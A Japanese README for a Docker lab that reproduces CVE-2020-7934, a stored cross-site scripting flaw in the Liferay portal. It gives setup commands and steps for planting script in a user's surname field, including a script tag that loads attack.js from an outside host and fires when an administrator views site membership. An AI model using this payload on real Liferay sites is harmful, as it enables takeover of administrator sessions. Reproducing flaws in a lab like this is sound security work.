## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GIARDINAS-DEV-AUDIT-XSS-CVE-2020-7934
# CVE 2020-7934
## CVEの実行方法
### 必要条件
1. docker
### 備考
攻撃スクリプトをオンラインに配置することが可能です(JSコードを指定) http://yourjavascript.com/ 攻撃用のオンラインJSスクリプト `html <script src="http://yourjavascript.com/920172199111/attack.js"></script> `
### 設定コマンド
1. このプロジェクトのルートフォルダに移動する
2. "sudo docker-compose up --build" を実行する
3. 新しいターミナル: "docker inspect liferay" を実行する ==> そして IPAddress の値をコピーする
4. 新しいターミナル: "python api_attacker.py" を実行する
5. ブラウザを開き、"http://IPAddress:8080" にアクセスする ==> liferay ポータルが応答として表示されるはずです
6. コンテナを停止・削除するには "sudo docker-compose rm" を使用する
### 攻撃手順
1. liferay にユーザーとして登録し、ログインし、「利用可能なサイト」セクションで「liferay」サイトに参加する。
2. JSスクリプト内の「姓」を変更する(直接()または「src = "http ..."」を通じて)
3. 管理者 liferay としてログインする(ユーザー名: some-email@example.com、パスワード: test)
4. 利用可能なサイトに移動し、「liferay」をクリックすると、このサイトの公開ページが開く。
5. 新しいページに移動すると、右側にメニューが開くので、「メンバーシップ」をクリックする。